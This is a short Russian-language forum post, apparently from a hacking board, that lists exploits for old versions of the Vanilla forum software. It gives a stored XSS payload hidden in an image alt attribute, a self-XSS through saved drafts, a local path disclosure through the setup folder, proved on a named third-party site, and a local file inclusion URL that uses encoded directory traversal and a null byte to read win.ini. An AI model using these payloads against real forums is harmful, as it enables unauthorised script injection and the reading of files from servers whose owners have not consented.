Vanilla <= 2.1.1 stored XSS в любом сообщении XSS exploit: Code: <img alt="<img onerror=alert(1)//"<"> proof: Vanilla <= 2.1.1 Self XSS в черновиках Описание: Создаем тему с стандартным xss пэйлоадом в имени. Code: <script>alert(1)</script> Но вместо того чтобы отправить её, сохраняем в черновики. Рузельтат: Алерт при входе в "Черновики" Можно проверить это место на csrf... Vanilla <= 2.0.18.10 раскрытие локальных путей: Раскрытие бывает по адресу: Code: localhost/forums/setup/ Proof: Code: http://chklst.ru/forum/setup/style.css Vanilla 2.0.17.1 - 2.0.17.9 Local File Inclusion Пример: Code: http://www.example.com/vanilla/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
